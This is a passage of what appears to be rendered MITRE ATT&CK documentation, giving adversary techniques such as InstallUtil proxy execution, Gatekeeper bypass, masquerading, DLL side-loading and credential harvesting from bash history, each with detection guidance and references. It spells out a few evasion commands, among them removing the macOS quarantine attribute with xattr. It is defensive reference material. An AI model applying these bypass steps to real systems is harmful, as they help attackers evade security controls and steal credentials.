<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1115">https://attack.mitre.org/wiki/Technique/T1115</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/">http://www.rvrsh3ll.net/blog/empyre/operating-with-empyre/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/ms649012">https://msdn.microsoft.com/en-us/library/ms649012</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_installutil"><a class="anchor" href="#_installutil"></a><a class="link" href="#_installutil">InstallUtil</a></h3>
<div class="paragraph">
<p>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.[[Citation: MSDN InstallUtil]] InstallUtil is located in the .NET directory on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;.InstallUtil.exe is digitally signed by Microsoft.</p>
</div>
<div class="paragraph">
<p>Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;.[[Citation: SubTee GitHub All The Things Application Whitelisting Bypass]]</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Contributors: Casey Smith</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 623. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1118">https://attack.mitre.org/wiki/Technique/T1118</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/50614e95.aspx">https://msdn.microsoft.com/en-us/library/50614e95.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/subTee/AllTheThings">https://github.com/subTee/AllTheThings</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_obfuscation"><a class="anchor" href="#_data_obfuscation"></a><a class="link" href="#_data_obfuscation">Data Obfuscation</a></h3>
<div class="paragraph">
<p>Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 624. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1001">https://attack.mitre.org/wiki/Technique/T1001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shortcut_modification"><a class="anchor" href="#_shortcut_modification"></a><a class="link" href="#_shortcut_modification">Shortcut Modification</a></h3>
<div class="paragraph">
<p>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</p>
</div>
<div class="paragraph">
<p>Detection: Since a shortcut&#8217;s target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 625. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1023">https://attack.mitre.org/wiki/Technique/T1023</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscated_files_or_information"><a class="anchor" href="#_obfuscated_files_or_information"></a><a class="link" href="#_obfuscated_files_or_information">Obfuscated Files or Information</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering, Binary file metadata</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 626. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1027">https://attack.mitre.org/wiki/Technique/T1027</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_video_capture"><a class="anchor" href="#_video_capture"></a><a class="link" href="#_video_capture">Video Capture</a></h3>
<div class="paragraph">
<p>An adversary can leverage a computer&#8217;s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.</p>
</div>
<div class="paragraph">
<p>Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim&#8217;s screen.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.</p>
</div>
<div class="paragraph">
<p>Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, File monitoring, API monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 627. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1125">https://attack.mitre.org/wiki/Technique/T1125</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gatekeeper_bypass"><a class="anchor" href="#_gatekeeper_bypass"></a><a class="link" href="#_gatekeeper_bypass">Gatekeeper Bypass</a></h3>
<div class="paragraph">
<p>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple&#8217;s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.</p>
</div>
<div class="paragraph">
<p>Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network wont set this flag. Additionally, other utilities or events like drive-by downloads dont necessarily set it either. This completely bypasses the built-in Gatekeeper check[[Citation: Methods of Mac Malware Persistence]]. The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt; [[Citation: Clearing quarantine attribute]][[Citation: OceanLotus for OS X]].</p>
</div>
<div class="paragraph">
<p>In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOSs gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the url where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application [[Citation: Bypassing Gatekeeper]].</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.</p>
</div>
<div class="paragraph">
<p>Platforms: MacOS, OS X</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 628. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1144">https://attack.mitre.org/wiki/Technique/T1144</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/">https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/">https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update">https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_masquerading"><a class="anchor" href="#_masquerading"></a><a class="link" href="#_masquerading">Masquerading</a></h3>
<div class="paragraph">
<p>Masquerading occurs when an executable, legitimate or malicious, is placed in a commonly trusted location (such as C:\Windows\System32) or named with a common name (such as "explorer.exe" or "svchost.exe") to bypass tools that trust executables by relying on file name or path. An adversary may even use a renamed copy of a legitimate utility, such as rundll32.exe.[[Citation: Endgame Masquerade Ball]] Masquerading also may be done to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.</p>
</div>
<div class="paragraph">
<p>Detection: Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.</p>
</div>
<div class="paragraph">
<p>If file names are mismatched between the binary name on disk and the binary&#8217;s resource section, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries could provide useful leads, but may not always be indicative of malicious activity.[[Citation: Endgame Masquerade Ball]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Binary file metadata</p>
</div>
<div class="paragraph">
<p>Contributors: ENDGAME</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 629. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1036">https://attack.mitre.org/wiki/Technique/T1036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/how-hunt-masquerade-ball">https://www.endgame.com/blog/how-hunt-masquerade-ball</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dll_side_loading"><a class="anchor" href="#_dll_side_loading"></a><a class="link" href="#_dll_side_loading">DLL Side-Loading</a></h3>
<div class="paragraph">
<p>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests[[Citation: MSDN Manifests]] are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.[[Citation: Stewart 2014]]</p>
</div>
<div class="paragraph">
<p>Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Process monitoring, Loaded DLLs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 630. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1073">https://attack.mitre.org/wiki/Technique/T1073</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/aa375365">https://msdn.microsoft.com/en-us/library/aa375365</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_automated_exfiltration"><a class="anchor" href="#_automated_exfiltration"></a><a class="link" href="#_automated_exfiltration">Automated Exfiltration</a></h3>
<div class="paragraph">
<p>Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 631. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1020">https://attack.mitre.org/wiki/Technique/T1020</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_service_scanning"><a class="anchor" href="#_network_service_scanning"></a><a class="link" href="#_network_service_scanning">Network Service Scanning</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as [[Lateral Movement]], based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Normal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process use of network, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 632. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1046">https://attack.mitre.org/wiki/Technique/T1046</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bash_profile_and_bashrc"><a class="anchor" href="#_bash_profile_and_bashrc"></a><a class="link" href="#_bash_profile_and_bashrc">.bash_profile and .bashrc</a></h3>
<div class="paragraph">
<p>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are executed in a user&#8217;s context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, &lt;code&gt;~/.bashrc&lt;/code&gt; is executed. This allows users more fine grained control over when they want certain commands executed.</p>
</div>
<div class="paragraph">
<p>Mac&#8217;s Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell.</p>
</div>
<div class="paragraph">
<p>Detection: While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 633. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1156">https://attack.mitre.org/wiki/Technique/T1156</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bash_history"><a class="anchor" href="#_bash_history"></a><a class="link" href="#_bash_history">Bash History</a></h3>
<div class="paragraph">
<p>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the users &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the users last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials.[[Citation: External to DA, the OS X Way]]</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring when the user&#8217;s &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 634. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1139">https://attack.mitre.org/wiki/Technique/T1139</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_replication_through_removable_media"><a class="anchor" href="#_replication_through_removable_media"></a><a class="link" href="#_replication_through_removable_media">Replication Through Removable Media</a></h3>
<div class="paragraph">
<p>Adversaries may move to additional systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into another system and executes. This may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for [[Command and Control]] and system and network information <a id="Discovery"></a>.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Data loss prevention</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 635. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1091">https://attack.mitre.org/wiki/Technique/T1091</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_desktop_protocol"><a class="anchor" href="#_remote_desktop_protocol"></a><a class="link" href="#_remote_desktop_protocol">Remote Desktop Protocol</a></h3>
<div class="paragraph">
<p>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).Remote Services similar to RDS.</p>
</div>
<div class="paragraph">
<p>Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Accessibility Features technique for <a id="Persistence"></a>.[[Citation: Alperovitch Malware]]</p>
</div>
<div class="paragraph">
<p>Detection: Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Netflow/Enclave netflow, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 636. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1076">https://attack.mitre.org/wiki/Technique/T1076</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx">https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/">http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scheduled_transfer"><a class="anchor" href="#_scheduled_transfer"></a><a class="link" href="#_scheduled_transfer">Scheduled Transfer</a></h3>
<div class="paragraph">
<p>Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.</p>
</div>
<div class="paragraph">
<p>When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 637. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1029">https://attack.mitre.org/wiki/Technique/T1029</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bypass_user_account_control"><a class="anchor" href="#_bypass_user_account_control"></a><a class="link" href="#_bypass_user_account_control">Bypass User Account Control</a></h3>
<div class="paragraph">
